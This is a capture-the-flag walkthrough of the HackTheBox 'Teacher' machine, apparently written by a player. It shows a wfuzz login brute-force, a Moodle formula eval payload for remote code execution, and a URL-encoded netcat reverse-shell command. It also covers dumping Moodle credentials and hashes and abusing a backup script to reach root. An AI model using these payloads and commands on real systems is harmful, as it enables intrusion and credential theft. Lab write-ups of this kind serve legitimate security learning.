Hackthebox Walkthrough — Teacher

Local IP : 10.10.14.4

Target : 10.10.10.153

Step 1 : Nmap Enumeration

only port 80 (web http server) is open

version : Apache httpd 2.4.25 ( running on Linux Debian)

browse the website page

We could tell a new portal is open for teachers and students

click on other links , it transfer us into the gallery

Step 2 : running dirbuster to enumearte

browse the link /images

we found out that th images 5.png contain some errors

potential password part :Th4CoolTheacha

Username : Giovanni

Also we know CMS moodle is running on the webserver

use crunch to generate a passwords list file

generate a length=15 passwords files and try bruteforce the correct one

wfuzz to fuzz out the password

wfuzz -w password.txt -L -d “username=Giovanni&password=FUZZ” — hw 1224 http://10.10.10.153/moodle/login/index.php

The password is : Th4C00lTheacha#

log in moodle

And we logged in the dashboard as Giovanni

Google moodle exploit and found out the “EVIL TEACHER” exploit for remote code execution

https://blog.ripstech.com/2018/moodle-remote-code-execution/

in the math formula function , php function eval() allows us to execute of arbitrary php code

turn edit on

add a quiz

add some questions

add the successful payload /*{a*/`$_GET[0]`;//{x}} ​

url decode and modify the code to make it be remote code executable

http://10.10.10.153/moodle/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D7%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=6&wizardnow=datasetitems&cmid=7&0=rm%20%2ftmp%2ff%3bmkfifo%20%2ftmp%2ff%3bcat%20%2ftmp%2ff|%2fbin%2fsh%20-i%202%3E%261|nc%2010.10.14.7%209001%20%3E%2ftmp%2ff

and here we got a reverse shell back with netcat

spawn a python tty shell

go to the moodle database , config.php file contains the database password

for mysql

log in the database

SELECT * from mdl_user\G

we found a password hash under giovannibak

google the md5 hash and decrypted it as expelled

grab the user flag

Run LinEnum.sh in the /tmp , nothing interesting

in the /tmp file , we see a course backup zip file

from the backup.sh script we found in /usr/bin

this tells us

go to home directory /home/giovanni/work

create an archive with the content of the courses directory

browse to /tmp

give read and write permissions to everybody on the /home/giovanni/work/tmp directory and subdirectories

script can be leveraged in order to retrieve the content of the
/root ​ folder and gain the root flag. courses file could be renamed

thus we can extract the root.txt with the script